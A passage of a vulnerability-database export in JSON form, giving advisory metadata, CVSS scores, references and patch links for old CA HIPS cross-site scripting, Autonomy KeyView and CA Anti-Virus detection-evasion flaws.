"id": "CNNVD-201106-004"
},
{
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#126159"
},
{
"db": "VULHUB",
"id": "VHN-48493"
},
{
"db": "BID",
"id": "48013"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"db": "PACKETSTORM",
"id": "102365"
},
{
"db": "PACKETSTORM",
"id": "102187"
},
{
"db": "PACKETSTORM",
"id": "101914"
},
{
"db": "PACKETSTORM",
"id": "102081"
},
{
"db": "PACKETSTORM",
"id": "115865"
},
{
"db": "CNNVD",
"id": "CNNVD-201106-004"
},
{
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-06-07T00:00:00",
"db": "CERT/CC",
"id": "VU#126159"
},
{
"date": "2011-07-18T00:00:00",
"db": "VULHUB",
"id": "VHN-48493"
},
{
"date": "2011-05-24T00:00:00",
"db": "BID",
"id": "48013"
},
{
"date": "2011-06-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"date": "2011-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"date": "2011-06-17T04:44:22",
"db": "PACKETSTORM",
"id": "102365"
},
{
"date": "2011-06-12T08:47:41",
"db": "PACKETSTORM",
"id": "102187"
},
{
"date": "2011-06-01T04:21:47",
"db": "PACKETSTORM",
"id": "101914"
},
{
"date": "2011-06-08T02:09:27",
"db": "PACKETSTORM",
"id": "102081"
},
{
"date": "2012-08-24T05:43:31",
"db": "PACKETSTORM",
"id": "115865"
},
{
"date": "2011-06-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201106-004"
},
{
"date": "2011-07-18T22:55:00.860000",
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-06-04T00:00:00",
"db": "CERT/CC",
"id": "VU#126159"
},
{
"date": "2013-02-07T00:00:00",
"db": "VULHUB",
"id": "VHN-48493"
},
{
"date": "2015-03-19T08:17:00",
"db": "BID",
"id": "48013"
},
{
"date": "2011-06-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-001718"
},
{
"date": "2011-07-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-001933"
},
{
"date": "2011-07-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201106-004"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2011-0548"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201106-004"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers",
"sources": [
{
"db": "CERT/CC",
"id": "VU#126159"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201106-004"
}
],
"trust": 0.6
}
}
VAR-200710-0051
Vulnerability from variot - Updated: 2025-04-10 23:24Cross-site scripting (XSS) vulnerability in the Server component in CA Host-Based Intrusion Prevention System (HIPS) before 8.0.0.93 allows remote attackers to inject arbitrary web script or HTML via requests that are written to logs for later display in the log viewer. Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. This issue affects versions of CA HIPS prior to 8.0.0.93. CA-based host intrusion detection system (HIPS) combines independent firewall, intrusion detection and defense capabilities to provide active centralized threat defense.
Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure.
The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,700 different Windows applications.
Input passed in certain requests to the server is not properly sanitised before being logged.
The vulnerability is reported in versions prior to 8.0.0.93.
SOLUTION: Apply patches. http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO91494
PROVIDED AND/OR DISCOVERED BY: The vendor credits David Maciejak.
ORIGINAL ADVISORY: http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: [CAID 35754]: CA Host-Based Intrusion Prevention System (CA HIPS) Server Vulnerability
CA Vuln ID (CAID): 35754
CA Advisory Date: 2007-10-18
Reported By: David Maciejak
Impact: A remote attacker can take unauthorized administrative action. The vulnerability, CVE-2007-5472, occurs due to raw request data being displayed in the log when viewed by a browser. Note: The client installation is not vulnerable.
Mitigating Factors: The client installation is not vulnerable.
Severity: CA has given these vulnerabilities a maximum risk rating of Medium.
Affected Products: CA Host-Based Intrusion Prevention System (CA HIPS) r8
Affected Platforms: Windows
Status and Recommendation: CA has issued the following patch to address the vulnerabilities. CA Host-Based Intrusion Prevention System (CA HIPS) r8: QO91494
How to determine if you are affected: 1. Log in to the HIPS Administration Console. 2. Scroll down to the end of the Main page. 3. Press the "About" link on the right bottom side of the page. 4. Check the version. If the version is less than 8.0.0.93, the installation is vulnerable.
Workaround: None
References (URLs may wrap): CA SupportConnect: http://supportconnect.ca.com/ Security Notice for CA Host-Based Intrusion Prevention System (CA HIPS) Server http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp Solution Document Reference APARs: QO91494 CA Security Advisor posting: CA Host-Based Intrusion Prevention System (CA HIPS) Server Vulnerability http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=158327 CA Vuln ID (CAID): 35754 http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35754 Reported By: David Maciejak CVE References: CVE-2007-5472 - log content injection http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5472 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to vuln AT ca DOT com, or utilize our "Submit a Vulnerability" form. URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2007 CA. All rights reserved.
-----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFHGLWAeSWR3+KUGYURAlHTAJ9Wee7boFMoFj8p/dsrJl7YbkWmvQCbBeJ0 YlGWH5DdYWfAT3nGzaxImnk= =bkku -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200710-0051",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "host-based intrusion prevention system",
"scope": "lte",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "host-based intrusion prevention system",
"scope": "lt",
"trust": 0.8,
"vendor": "ca",
"version": "8.0.0.93"
},
{
"model": "host-based intrusion prevention system",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8"
},
{
"model": "associates host-based intrusion prevention system",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.093"
}
],
"sources": [
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ca:host-based_intrusion_prevention_system",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "David Maciejak\u203b david.maciejak@kyxar.fr",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
],
"trust": 0.6
},
"cve": "CVE-2007-5472",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2007-5472",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-28834",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2007-5472",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2007-5472",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200710-426",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-28834",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the Server component in CA Host-Based Intrusion Prevention System (HIPS) before 8.0.0.93 allows remote attackers to inject arbitrary web script or HTML via requests that are written to logs for later display in the log viewer. \nAttacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible. \nThis issue affects versions of CA HIPS prior to 8.0.0.93. CA-based host intrusion detection system (HIPS) combines independent firewall, intrusion detection and defense capabilities to provide active centralized threat defense. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,700 different Windows applications. \n\nInput passed in certain requests to the server is not properly\nsanitised before being logged. \n\nThe vulnerability is reported in versions prior to 8.0.0.93. \n\nSOLUTION:\nApply patches. \nhttp://supportconnect.ca.com/sc/redir.jsp?reqPage=search\u0026searchID=QO91494\n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits David Maciejak. \n\nORIGINAL ADVISORY:\nhttp://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nTitle: [CAID 35754]: CA Host-Based Intrusion Prevention System \n(CA HIPS) Server Vulnerability\n\nCA Vuln ID (CAID): 35754\n\nCA Advisory Date: 2007-10-18\n\nReported By: David Maciejak\n\nImpact: A remote attacker can take unauthorized administrative \naction. The \nvulnerability, CVE-2007-5472, occurs due to raw request data being \ndisplayed in the log when viewed by a browser. Note: The client \ninstallation is not vulnerable. \n\nMitigating Factors: The client installation is not vulnerable. \n\nSeverity: CA has given these vulnerabilities a maximum risk rating \nof Medium. \n\nAffected Products:\nCA Host-Based Intrusion Prevention System (CA HIPS) r8\n\nAffected Platforms:\nWindows\n\nStatus and Recommendation:\nCA has issued the following patch to address the vulnerabilities. \nCA Host-Based Intrusion Prevention System (CA HIPS) r8: QO91494\n\nHow to determine if you are affected:\n1. Log in to the HIPS Administration Console. \n2. Scroll down to the end of the Main page. \n3. Press the \"About\" link on the right bottom side of the page. \n4. Check the version. If the version is less than 8.0.0.93, the \n installation is vulnerable. \n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nSecurity Notice for CA Host-Based Intrusion Prevention System \n(CA HIPS) Server\nhttp://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp\nSolution Document Reference APARs:\nQO91494\nCA Security Advisor posting:\nCA Host-Based Intrusion Prevention System (CA HIPS) Server \nVulnerability\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=158327\nCA Vuln ID (CAID): 35754\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35754\nReported By: \nDavid Maciejak\nCVE References:\nCVE-2007-5472 - log content injection\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5472\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFHGLWAeSWR3+KUGYURAlHTAJ9Wee7boFMoFj8p/dsrJl7YbkWmvQCbBeJ0\nYlGWH5DdYWfAT3nGzaxImnk=\n=bkku\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-5472"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-28834",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2007-5472",
"trust": 2.9
},
{
"db": "BID",
"id": "26134",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "27301",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2007-3547",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1018839",
"trust": 1.7
},
{
"db": "OSVDB",
"id": "37998",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "60283",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-28834",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "60238",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"id": "VAR-200710-0051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-10T23:24:22.859000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Notice for CA Host-Based Intrusion Prevention System (CA HIPS) Server",
"trust": 0.8,
"url": "http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp"
},
{
"title": "CA Host-based intrusion detection system server HTML Fixes for code injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147099"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://supportconnectw.ca.com/public/cahips/infodocs/cahips-secnotice.asp"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/26134"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/482536/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://osvdb.org/37998"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1018839"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/27301"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2007/3547"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/37285"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5472"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-5472"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/482536"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/27301/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16198/"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/sc/redir.jsp?reqpage=search\u0026searchid=qo91494"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-5472"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35754"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=158327"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-28834"
},
{
"db": "BID",
"id": "26134"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"db": "PACKETSTORM",
"id": "60238"
},
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-10-22T00:00:00",
"db": "VULHUB",
"id": "VHN-28834"
},
{
"date": "2007-10-18T00:00:00",
"db": "BID",
"id": "26134"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"date": "2007-10-22T18:39:08",
"db": "PACKETSTORM",
"id": "60238"
},
{
"date": "2007-10-22T22:50:26",
"db": "PACKETSTORM",
"id": "60283"
},
{
"date": "2007-10-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"date": "2007-10-22T19:46:00",
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-15T00:00:00",
"db": "VULHUB",
"id": "VHN-28834"
},
{
"date": "2007-10-19T19:47:00",
"db": "BID",
"id": "26134"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-002787"
},
{
"date": "2021-04-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200710-426"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2007-5472"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "60283"
},
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CA HIPS of Server Component cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2007-002787"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200710-426"
}
],
"trust": 0.6
}
}
VAR-200901-0282
Vulnerability from variot - Updated: 2025-04-10 23:23Multiple unspecified vulnerabilities in the Arclib library (arclib.dll) before 7.3.0.15 in the CA Anti-Virus engine for CA Anti-Virus for the Enterprise 7.1, r8, and r8.1; Anti-Virus 2007 v8 and 2008; Internet Security Suite 2007 v3 and 2008; and other CA products allow remote attackers to bypass virus detection via a malformed archive file. Computer Associates Anti-Virus engine is prone to multiple vulnerabilities that may allow certain compressed archives to bypass the scan engine. Successful exploits will allow attackers to distribute files containing malicious code that the antivirus engine will fail to detect. Products with 'arclib.dll' prior to version 7.3.0.15 are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Title: CA20090126-01: CA Anti-Virus Engine Detection Evasion Multiple Vulnerabilities
CA Advisory Reference: CA20090126-01
CA Advisory Date: 2009-01-26
Reported By: Thierry Zoller and Sergio Alvarez of n.runs AG
Impact: A remote attacker can evade detection. CA has released a new Anti-Virus engine to address the vulnerabilities. Consequently, detection evasion can be a concern for gateway anti-virus software if archives are not scanned, but the risk is effectively mitigated by the desktop anti-virus engine.
Mitigating Factors: See note above.
Severity: CA has given these vulnerabilities a Low risk rating. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.
